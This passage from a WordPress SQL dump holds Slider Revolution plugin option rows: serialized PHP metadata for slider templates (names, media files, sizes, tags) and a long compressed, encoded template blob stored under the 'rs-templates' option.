13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:410;a:13:{s:2:\"id\";s:3:\"296\";s:6:\"handle\";s:20:\"Caption_Light_01.png\";s:5:\"video\";s:20:\"Caption_Light_01.mp4\";s:4:\"name\";s:16:\"Caption_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:411;a:13:{s:2:\"id\";s:3:\"295\";s:6:\"handle\";s:19:\"Caption_Dark_04.png\";s:5:\"video\";s:19:\"Caption_Dark_04.mp4\";s:4:\"name\";s:15:\"Caption_Dark_04\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_04\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:412;a:13:{s:2:\"id\";s:3:\"294\";s:6:\"handle\";s:20:\"Caption_Light_02.png\";s:5:\"video\";s:20:\"Caption_Light_02.mp4\";s:4:\"name\";s:16:\"Caption_Light_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_02\";s:5:\"width\";s:3:\"828\";s:6:\"height\";s:3:\"450\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:413;a:13:{s:2:\"id\";s:3:\"293\";s:6:\"handle\";s:20:\"Caption_Light_04.png\";s:5:\"video\";s:20:\"Caption_Light_04.mp4\";s:4:\"name\";s:16:\"Caption_Light_04\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_04\";s:5:\"width\";s:4:\"1104\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:414;a:13:{s:2:\"id\";s:3:\"292\";s:6:\"handle\";s:22:\"Columns_4_Light_01.png\";s:5:\"video\";s:22:\"Columns_4_Light_01.mp4\";s:4:\"name\";s:18:\"Columns_4_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"Columns_4_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:415;a:13:{s:2:\"id\";s:3:\"291\";s:6:\"handle\";s:20:\"Caption_Light_05.png\";s:5:\"video\";s:20:\"Caption_Light_05.mp4\";s:4:\"name\";s:16:\"Caption_Light_05\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_05\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:416;a:13:{s:2:\"id\";s:3:\"290\";s:6:\"handle\";s:22:\"PromoCode_Light_01.png\";s:5:\"video\";s:22:\"PromoCode_Light_01.mp4\";s:4:\"name\";s:18:\"PromoCode_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"PromoCode_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}}s:4:\"tags\";a:18:{i:28;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}i:5;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:20;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:21;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}i:25;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:16;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}i:26;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}i:18;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:4;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:19;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:23;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}i:3;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:24;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}i:22;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:29;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}i:27;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}}','no'),
(800,'revslider-templates-check','1698022394','yes'),
(801,'revslider-templates-hash','b6897ad1ea846c0481d544eb1b0f97e9','yes'),
(802,'rs-templates-new','','no');
INSERT INTO `dnctiavkr_options` VALUES
(803,'rs-templates','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